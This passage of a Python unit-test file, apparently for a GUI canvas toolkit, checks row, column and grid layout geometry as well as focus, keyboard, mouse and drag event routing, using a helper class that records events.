canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 305, 20, 335))
def test_row_with_fixed_size_child_aligns_end(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(alignment="end")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(460, 305, 480, 335))
def test_row_layout_with_stretch_inside_column_layout_results_in_correct_vertical_positions(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
row = CanvasItem.CanvasItemComposition()
row.layout = CanvasItem.CanvasItemRowLayout()
row.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
row.add_stretch()
canvas_item.add_canvas_item(row)
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_stretch()
canvas_item.canvas_items[0].canvas_items[0].sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.canvas_items[1].sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_items[0].canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 20, 30))
self.assertEqual(canvas_item.canvas_items[1].canvas_rect, Geometry.IntRect.from_tlbr(20, 305, 40, 335))
def test_row_layout_with_stretch_inside_column_layout_results_in_correct_row_height(self):
    # Same shape as the vertical-positions test but without a trailing column
    # stretch: the row must still size itself to its 20-high fixed content.
    column = CanvasItem.CanvasItemComposition()
    column.layout = CanvasItem.CanvasItemColumnLayout()
    inner_row = CanvasItem.CanvasItemComposition()
    inner_row.layout = CanvasItem.CanvasItemRowLayout()
    row_item = CanvasItem.BackgroundCanvasItem("#F00")
    inner_row.add_canvas_item(row_item)
    inner_row.add_stretch()
    column.add_canvas_item(inner_row)
    column_item = CanvasItem.BackgroundCanvasItem("#F00")
    column.add_canvas_item(column_item)
    row_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
    column_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
    column.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(row_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 20, 30))
    self.assertEqual(column_item.canvas_rect, Geometry.IntRect.from_tlbr(20, 305, 40, 335))
def test_row_layout_with_stretch_on_each_side_centers_content(self):
    # Stretches flanking a fixed-size item in a row should center it
    # horizontally (305..335 within a 640-wide canvas).
    outer = CanvasItem.CanvasItemComposition()
    outer.layout = CanvasItem.CanvasItemColumnLayout()
    row = CanvasItem.CanvasItemComposition()
    row.layout = CanvasItem.CanvasItemRowLayout()
    row.add_stretch()
    content = CanvasItem.BackgroundCanvasItem("#F00")
    content.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
    row.add_canvas_item(content)
    row.add_stretch()
    outer.add_canvas_item(row)
    outer.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(content.canvas_rect, Geometry.IntRect.from_tlbr(0, 305, 20, 335))
def test_grid_layout_2x2_works(self):
    # Four items in a 2x2 grid: each cell receives an equal quarter
    # (320x240) of the 640x480 canvas.
    grid = CanvasItem.CanvasItemComposition()
    grid.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
    grid.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    expected_origins = [
        Geometry.IntPoint(x=0, y=0),
        Geometry.IntPoint(x=320, y=0),
        Geometry.IntPoint(x=0, y=240),
        Geometry.IntPoint(x=320, y=240),
    ]
    cell_size = Geometry.IntSize(width=320, height=240)
    for cell, expected_origin in zip(grid.canvas_items, expected_origins):
        self.assertEqual(cell.canvas_origin, expected_origin)
        self.assertEqual(cell.canvas_size, cell_size)
def test_grid_layout_splits_with_one_min_size_specified(self):
    # The top-right cell demands a 500x300 minimum; its row and column grow
    # to honor it and the remaining row/column absorb the leftover
    # (640-500=140 wide, 480-300=180 high).
    grid = CanvasItem.CanvasItemComposition()
    grid.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
    grid.canvas_items[1].sizing.minimum_height = 300
    grid.canvas_items[1].sizing.minimum_width = 500
    grid.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    expected = [
        (Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=140, height=300)),
        (Geometry.IntPoint(x=140, y=0), Geometry.IntSize(width=500, height=300)),
        (Geometry.IntPoint(x=0, y=300), Geometry.IntSize(width=140, height=180)),
        (Geometry.IntPoint(x=140, y=300), Geometry.IntSize(width=500, height=180)),
    ]
    for cell, (expected_origin, expected_size) in zip(grid.canvas_items, expected):
        self.assertEqual(cell.canvas_origin, expected_origin)
        self.assertEqual(cell.canvas_size, expected_size)
def test_grid_layout_within_column_layout(self):
    # A 2x2 grid beside a background item in a row: the row splits 640 into
    # two 320-wide halves, then the grid quarters its 320x480 half.
    row = CanvasItem.CanvasItemComposition()
    row.layout = CanvasItem.CanvasItemRowLayout()
    grid_canvas = CanvasItem.CanvasItemComposition()
    grid_canvas.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
    background = CanvasItem.BackgroundCanvasItem("#F00")
    row.add_canvas_item(background)
    row.add_canvas_item(grid_canvas)
    row.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(background.canvas_origin, Geometry.IntPoint(x=0, y=0))
    self.assertEqual(background.canvas_size, Geometry.IntSize(width=320, height=480))
    self.assertEqual(grid_canvas.canvas_origin, Geometry.IntPoint(x=320, y=0))
    self.assertEqual(grid_canvas.canvas_size, Geometry.IntSize(width=320, height=480))
    cell_size = Geometry.IntSize(width=160, height=240)
    cell_origins = [
        Geometry.IntPoint(x=0, y=0),
        Geometry.IntPoint(x=160, y=0),
        Geometry.IntPoint(x=0, y=240),
        Geometry.IntPoint(x=160, y=240),
    ]
    for cell, expected_origin in zip(grid_canvas.canvas_items, cell_origins):
        self.assertEqual(cell.canvas_origin, expected_origin)
        self.assertEqual(cell.canvas_size, cell_size)
def test_focus_changed_messages_sent_when_focus_changes(self):
    """Clicking between two focusable items updates focus and fires on_focus_changed on each affected item."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        canvas_item1.focusable = True
        canvas_item2.focusable = True
        # records which items received a focus-changed callback
        focus_changed_set = set()
        def focus_changed1(focused):
            focus_changed_set.add(canvas_item1)
        def focus_changed2(focused):
            focus_changed_set.add(canvas_item2)
        canvas_item1.on_focus_changed = focus_changed1
        canvas_item2.on_focus_changed = focus_changed2
        canvas_item.add_canvas_item(canvas_item1)
        canvas_item.add_canvas_item(canvas_item2)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: nothing focused before any click
        self.assertIsNone(canvas_item.focused_item)
        self.assertFalse(canvas_item1.focused)
        self.assertFalse(canvas_item2.focused)
        # click in item 1 and check that focus was updated and changed;
        # item 2 was never focused so it should see no callback
        modifiers = CanvasItem.KeyboardModifiers()
        canvas_item.canvas_widget.simulate_mouse_click(160, 240, modifiers)
        self.assertTrue(canvas_item1.focused)
        self.assertTrue(canvas_item1 in focus_changed_set)
        self.assertFalse(canvas_item2.focused)
        self.assertFalse(canvas_item2 in focus_changed_set)
        self.assertEqual(canvas_item.focused_item, canvas_item1)
        # click in item 2 and check that focus was updated and changed;
        # this time both items change state, so both get callbacks
        focus_changed_set.clear()
        canvas_item.canvas_widget.simulate_mouse_click(160 + 320, 240, modifiers)
        self.assertFalse(canvas_item1.focused)
        self.assertTrue(canvas_item1 in focus_changed_set)
        self.assertTrue(canvas_item2.focused)
        self.assertTrue(canvas_item2 in focus_changed_set)
        self.assertEqual(canvas_item.focused_item, canvas_item2)
def test_root_canvas_item_loses_focus_too_when_canvas_widget_loses_focus(self):
    """When the widget reports focus loss, the root canvas item clears its own focus state."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.focusable = True
        canvas_item.wants_mouse_events = True
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
        # check assumptions: nothing focused before the click
        modifiers = CanvasItem.KeyboardModifiers()
        self.assertIsNone(canvas_item.focused_item)
        self.assertFalse(canvas_item.focused)
        # clicking the root item focuses it
        canvas_item.canvas_widget.simulate_mouse_click(320, 240, modifiers)
        self.assertTrue(canvas_item.focused)
        self.assertEqual(canvas_item.focused_item, canvas_item)  # refers to itself??
        # become unfocused when the widget reports focus loss
        canvas_item.canvas_widget.on_focus_changed(False)
        self.assertFalse(canvas_item.focused)
        self.assertIsNone(canvas_item.focused_item)
def test_keys_go_to_focused_item(self):
    """Key presses are delivered to whichever focusable item was last clicked."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        canvas_item1.focusable = True
        canvas_item2.focusable = True
        canvas_item.add_canvas_item(canvas_item1)
        canvas_item.add_canvas_item(canvas_item2)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # click in item 1, then 2 and check key goes to 2nd item
        modifiers = CanvasItem.KeyboardModifiers()
        canvas_item.canvas_widget.simulate_mouse_click(160, 240, modifiers)
        canvas_item.canvas_widget.simulate_mouse_click(160 + 320, 240, modifiers)
        # check assumptions: the second click moved focus to item 2
        self.assertFalse(canvas_item1.focused)
        self.assertTrue(canvas_item2.focused)
        # key should go to 2nd item
        canvas_item.canvas_widget.on_key_pressed('a')
        # check result
        self.assertIsNone(canvas_item1.key)
        self.assertEqual(canvas_item2.key, 'a')
        # now back to first item: reset recorded keys, refocus item 1, retype
        canvas_item1.key = None
        canvas_item2.key = None
        canvas_item.canvas_widget.simulate_mouse_click(160, 240, modifiers)
        canvas_item.canvas_widget.on_key_pressed('a')
        self.assertEqual(canvas_item1.key, 'a')
        self.assertIsNone(canvas_item2.key)
def test_composition_layout_sizing_has_infinite_maximum_if_first_child_is_finite_and_one_is_infinite(self):
    # First child pinned to height 40, second unconstrained: the composition's
    # minimum height tracks the pin, but its maximum stays unbounded (None).
    composition = CanvasItem.CanvasItemComposition()
    pinned_child = CanvasItem.BackgroundCanvasItem("#F00")
    free_child = CanvasItem.BackgroundCanvasItem("#0F0")
    composition.add_canvas_item(pinned_child)
    composition.add_canvas_item(free_child)
    pinned_child.sizing.maximum_height = 40
    pinned_child.sizing.minimum_height = 40
    composition.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(composition.layout_sizing.minimum_height, 40)
    self.assertIsNone(composition.layout_sizing.maximum_height)
def test_composition_layout_sizing_has_infinite_maximum_if_last_child_is_finite_and_one_is_infinite(self):
    # Mirror of the first-child case: the pin is on the LAST child and the
    # composition's maximum height must still be unbounded (None).
    composition = CanvasItem.CanvasItemComposition()
    free_child = CanvasItem.BackgroundCanvasItem("#F00")
    pinned_child = CanvasItem.BackgroundCanvasItem("#0F0")
    composition.add_canvas_item(free_child)
    composition.add_canvas_item(pinned_child)
    pinned_child.sizing.maximum_height = 40
    pinned_child.sizing.minimum_height = 40
    composition.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(composition.layout_sizing.minimum_height, 40)
    self.assertIsNone(composition.layout_sizing.maximum_height)
def test_column_layout_sizing_has_infinite_maximum_if_one_child_is_finite_and_one_is_infinite(self):
    # Same scenario under an explicit column layout: one pinned child must not
    # cap the column's maximum height.
    column = CanvasItem.CanvasItemComposition()
    column.layout = CanvasItem.CanvasItemColumnLayout()
    pinned_child = CanvasItem.BackgroundCanvasItem("#F00")
    free_child = CanvasItem.BackgroundCanvasItem("#0F0")
    column.add_canvas_item(pinned_child)
    column.add_canvas_item(free_child)
    pinned_child.sizing.maximum_height = 40
    pinned_child.sizing.minimum_height = 40
    column.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(column.layout_sizing.minimum_height, 40)
    self.assertIsNone(column.layout_sizing.maximum_height)
def test_grid_layout_sizing_has_infinite_maximum_if_one_child_is_finite_and_one_is_infinite(self):
    # One cell of a 2x2 grid pinned to 40x40: the grid's minimums track the
    # pin but both maximums remain unbounded because the other cells are free.
    grid_canvas = CanvasItem.CanvasItemComposition()
    grid_canvas.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
    grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
    pinned_cell = grid_canvas.canvas_items[0]
    pinned_cell.sizing.maximum_height = 40
    pinned_cell.sizing.minimum_height = 40
    pinned_cell.sizing.maximum_width = 40
    pinned_cell.sizing.minimum_width = 40
    grid_canvas.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(grid_canvas.layout_sizing.minimum_height, 40)
    self.assertIsNone(grid_canvas.layout_sizing.maximum_height)
    self.assertEqual(grid_canvas.layout_sizing.minimum_width, 40)
    self.assertIsNone(grid_canvas.layout_sizing.maximum_width)
def test_height_constraint_inside_layout_with_another_height_constraint_results_in_proper_layout(self):
    # Outer column: a 10px-high pinned item above a nested column whose
    # second child is pinned to 40px. The nested column itself should absorb
    # the remaining 470px despite its internal constraint.
    outer = CanvasItem.CanvasItemComposition()
    outer.layout = CanvasItem.CanvasItemColumnLayout()
    top_item = CanvasItem.BackgroundCanvasItem("#F00")
    outer.add_canvas_item(top_item)
    top_item.sizing.maximum_height = 10
    top_item.sizing.minimum_height = 10
    inner = CanvasItem.CanvasItemComposition()
    inner.layout = CanvasItem.CanvasItemColumnLayout()
    inner.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
    inner.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
    inner.canvas_items[1].sizing.maximum_height = 40
    inner.canvas_items[1].sizing.minimum_height = 40
    outer.add_canvas_item(inner)
    outer.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(top_item.canvas_origin, Geometry.IntPoint(x=0, y=0))
    self.assertEqual(top_item.canvas_size, Geometry.IntSize(width=640, height=10))
    self.assertEqual(inner.canvas_origin, Geometry.IntPoint(x=0, y=10))
    self.assertEqual(inner.canvas_size, Geometry.IntSize(width=640, height=470))
def test_grid_layout_2x2_canvas_item_at_point(self):
    # 2x2 grid with 20px spacing and 10px margins: points that fall in the
    # margins or inter-cell spacing hit the grid itself; points inside a
    # cell hit that cell's child item.
    grid = CanvasItem.CanvasItemComposition()
    grid.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2), spacing=20, margins=Geometry.Margins(top=10, bottom=10, left=10, right=10))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
    grid.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
    grid.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(grid.canvas_item_at_point(5, 5), grid)  # inside the margin
    self.assertEqual(grid.canvas_item_at_point(20, 20), grid.canvas_items[0])
    self.assertEqual(grid.canvas_item_at_point(320, 20), grid)  # inside the spacing
    self.assertEqual(grid.canvas_item_at_point(340, 20), grid.canvas_items[1])
    self.assertEqual(grid.canvas_item_at_point(320, 240), grid)
    self.assertEqual(grid.canvas_item_at_point(300, 260), grid.canvas_items[2])
    self.assertEqual(grid.canvas_item_at_point(340, 260), grid.canvas_items[3])
def test_grid_layout_2x2_canvas_item_scroll_area_with_content_and_scroll_bars_inside_column_lays_out_properly(self):
    # Scroll area plus vertical and horizontal scroll bars arranged in a 2x2
    # grid inside a column; the bars take their thickness (16 wide / 20 high
    # per the asserted rects) and the scroll area gets the remainder.
    column = CanvasItem.CanvasItemComposition()
    column.layout = CanvasItem.CanvasItemColumnLayout()
    content = CanvasItem.BackgroundCanvasItem("#F00")
    content.sizing.set_fixed_size(Geometry.IntSize(width=250, height=60))
    scroll_area_canvas_item = CanvasItem.ScrollAreaCanvasItem(content)
    scroll_area_canvas_item.auto_resize_contents = True
    vertical_bar = CanvasItem.ScrollBarCanvasItem(scroll_area_canvas_item)
    horizontal_bar = CanvasItem.ScrollBarCanvasItem(scroll_area_canvas_item, CanvasItem.Orientation.Horizontal)
    horizontal_bar.sizing.set_fixed_height(20)
    grid = CanvasItem.CanvasItemComposition()
    grid.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(width=2, height=2))
    grid.add_canvas_item(scroll_area_canvas_item, Geometry.IntPoint(x=0, y=0))
    grid.add_canvas_item(vertical_bar, Geometry.IntPoint(x=1, y=0))
    grid.add_canvas_item(horizontal_bar, Geometry.IntPoint(x=0, y=1))
    column.add_canvas_item(grid)
    column.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=200, height=100))
    self.assertEqual(scroll_area_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 80, 184))
    self.assertEqual(vertical_bar.canvas_rect, Geometry.IntRect.from_tlbr(0, 184, 80, 200))
    self.assertEqual(horizontal_bar.canvas_rect, Geometry.IntRect.from_tlbr(80, 0, 100, 184))
def test_item_in_column_layout_with_preferred_less_than_min_expands(self):
    # Preferred height (10) below minimum height (20): per the asserted rect
    # the item expands to fill the remaining 60px between the two 20px
    # spacers rather than collapsing to its preferred size.
    column = CanvasItem.CanvasItemComposition()
    column.layout = CanvasItem.CanvasItemColumnLayout()
    column.add_spacing(20)
    item = CanvasItem.EmptyCanvasItem()
    item.sizing.preferred_height = 10
    item.sizing.minimum_height = 20
    column.add_canvas_item(item)
    column.add_spacing(20)
    column.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=30, height=100))
    top_spacer, middle_item, bottom_spacer = column.canvas_items
    self.assertEqual(top_spacer.canvas_rect, Geometry.IntRect.from_tlbr(0, 15, 20, 15))
    self.assertEqual(middle_item.canvas_rect, Geometry.IntRect.from_tlbr(20, 0, 80, 30))
    self.assertEqual(bottom_spacer.canvas_rect, Geometry.IntRect.from_tlbr(80, 15, 100, 15))
class TestCanvasItem(CanvasItem.CanvasItemComposition):
    """Canvas item that records mouse, drag, and repaint activity for tests.

    Tests read the recorded attributes (mouse_inside, mouse_pos,
    mouse_pressed_pos, drag_inside, drag_pos, repaint_count) to verify event
    routing; repaint_delay lets tests artificially slow repaints.
    """

    def __init__(self):
        # zero-argument super() replaces the legacy two-argument form
        # super(TestCanvasItemClass.TestCanvasItem, self); it is equivalent in
        # Python 3 and consistent with _repaint below.
        super().__init__()
        self.mouse_inside = False       # True between mouse_entered/mouse_exited
        self.mouse_pos = None           # last position from mouse_position_changed
        self.mouse_pressed_pos = None   # position of an in-progress press, else None
        self.drag_inside = False        # True between drag_enter/drag_leave
        self.drag_pos = None            # last position from drag_move
        self.repaint_count = 0          # number of _repaint calls
        self.repaint_delay = 0.0        # seconds to sleep inside each _repaint

    def mouse_entered(self):
        self.mouse_inside = True

    def mouse_exited(self):
        self.mouse_inside = False
        self.mouse_pos = None

    def mouse_position_changed(self, x, y, modifiers):
        self.mouse_pos = Geometry.IntPoint(y=y, x=x)

    def mouse_pressed(self, x, y, modifiers):
        self.mouse_pressed_pos = Geometry.IntPoint(y=y, x=x)

    def mouse_released(self, x, y, modifiers):
        self.mouse_pressed_pos = None

    def drag_enter(self, mime_data):
        self.drag_inside = True

    def drag_leave(self):
        self.drag_inside = False
        self.drag_pos = None

    def drag_move(self, mime_data, x, y):
        self.drag_pos = Geometry.IntPoint(y=y, x=x)

    def drop(self, mime_data, x, y):
        # always report a successful copy drop
        return "copy"

    def _repaint(self, drawing_context):
        # count repaints and optionally slow them down so tests can exercise
        # repaint timing
        self.repaint_count += 1
        time.sleep(self.repaint_delay)
        super()._repaint(drawing_context)
def test_mouse_tracking_on_topmost_non_overlapped_canvas_item(self):
    """Mouse enter/move/exit events reach a mouse-tracking item nested one level down."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container_canvas_item = CanvasItem.CanvasItemComposition()
        test_canvas_item = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item.wants_mouse_events = True
        container_canvas_item.add_canvas_item(test_canvas_item)
        canvas_item.add_canvas_item(container_canvas_item)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        modifiers = CanvasItem.KeyboardModifiers()
        # check assumptions
        self.assertFalse(test_canvas_item.mouse_inside)
        # run test: enter, move to center, verify tracking, then exit
        canvas_item.canvas_widget.on_mouse_entered()
        canvas_item.canvas_widget.on_mouse_position_changed(320, 240, modifiers)
        self.assertTrue(test_canvas_item.mouse_inside)
        self.assertEqual(test_canvas_item.mouse_pos, Geometry.IntPoint(x=320, y=240))
        canvas_item.canvas_widget.on_mouse_exited()
        self.assertFalse(test_canvas_item.mouse_inside)
def test_mouse_tracking_on_container_with_non_overlapped_canvas_item(self):
    """Mouse events reach a tracking container even when it holds a non-tracking child."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        test_canvas_item = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item.wants_mouse_events = True
        # the background child does not want mouse events; tracking should
        # fall through to the container
        test_canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
        canvas_item.add_canvas_item(test_canvas_item)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        modifiers = CanvasItem.KeyboardModifiers()
        # check assumptions
        self.assertFalse(test_canvas_item.mouse_inside)
        # run test
        canvas_item.canvas_widget.on_mouse_entered()
        canvas_item.canvas_widget.on_mouse_position_changed(320, 240, modifiers)
        self.assertTrue(test_canvas_item.mouse_inside)
        self.assertEqual(test_canvas_item.mouse_pos, Geometry.IntPoint(x=320, y=240))
        canvas_item.canvas_widget.on_mouse_exited()
        self.assertFalse(test_canvas_item.mouse_inside)
def test_mouse_tracking_on_container_with_two_overlapped_canvas_items(self):
    """Mouse tracking still reaches the tracking item when a non-tracking item overlays it."""
    # tests case where container contains a mouse tracking canvas item with a non-mouse
    # tracking canvas item overlayed.
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        test_canvas_item = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item.wants_mouse_events = True
        test_canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
        canvas_item.add_canvas_item(test_canvas_item)
        # this second item overlays the tracking item and does not want mouse events
        canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        modifiers = CanvasItem.KeyboardModifiers()
        # check assumptions
        self.assertFalse(test_canvas_item.mouse_inside)
        # run test
        canvas_item.canvas_widget.on_mouse_entered()
        canvas_item.canvas_widget.on_mouse_position_changed(320, 240, modifiers)
        self.assertTrue(test_canvas_item.mouse_inside)
        self.assertEqual(test_canvas_item.mouse_pos, Geometry.IntPoint(x=320, y=240))
        canvas_item.canvas_widget.on_mouse_exited()
        self.assertFalse(test_canvas_item.mouse_inside)
def test_drag_tracking_on_topmost_non_overlapped_canvas_item(self):
    """Drag enter/move/drop events route to a drag-tracking item nested one level down."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container_canvas_item = CanvasItem.CanvasItemComposition()
        test_canvas_item = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item.wants_drag_events = True
        container_canvas_item.add_canvas_item(test_canvas_item)
        canvas_item.add_canvas_item(container_canvas_item)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions
        self.assertFalse(test_canvas_item.drag_inside)
        # run test: the widget accepts the drag, the item tracks the move,
        # and the drop returns TestCanvasItem's "copy" response
        self.assertEqual(canvas_item.canvas_widget.on_drag_enter(None), "accept")
        canvas_item.canvas_widget.on_drag_move(None, 320, 240)
        self.assertTrue(test_canvas_item.drag_inside)
        self.assertEqual(test_canvas_item.drag_pos, Geometry.IntPoint(x=320, y=240))
        self.assertEqual(canvas_item.canvas_widget.on_drop(None, 320, 240), "copy")
        self.assertFalse(test_canvas_item.drag_inside)
def test_drag_tracking_from_one_item_to_another(self):
    """A press in one item followed by a release over another leaves mouse state routed correctly."""
    ui = TestUI.UserInterface()
    modifiers = CanvasItem.KeyboardModifiers()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container_canvas_item = CanvasItem.CanvasItemComposition()
        container_canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        test_canvas_item1 = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item1.wants_mouse_events = True
        test_canvas_item1.wants_drag_events = True
        container_canvas_item.add_canvas_item(test_canvas_item1)
        canvas_item.add_canvas_item(container_canvas_item)
        test_canvas_item2 = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item2.wants_mouse_events = True
        container_canvas_item.add_canvas_item(test_canvas_item2)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: a simple press/release in the left item records
        # and then clears its pressed position
        canvas_item.canvas_widget.on_mouse_entered()
        canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_pressed(160, 160, modifiers)
        self.assertEqual(test_canvas_item1.mouse_pressed_pos, (160, 160))
        canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
        self.assertIsNone(test_canvas_item1.mouse_pressed_pos)
        # now the drag. start in the right item, press mouse, move to left item
        # release mouse; press mouse again in left pane and verify it is in the left pane
        canvas_item.canvas_widget.on_mouse_position_changed(480, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_pressed(480, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
        # immediate mouse press after mouse release
        canvas_item.canvas_widget.on_mouse_pressed(160, 160, modifiers)
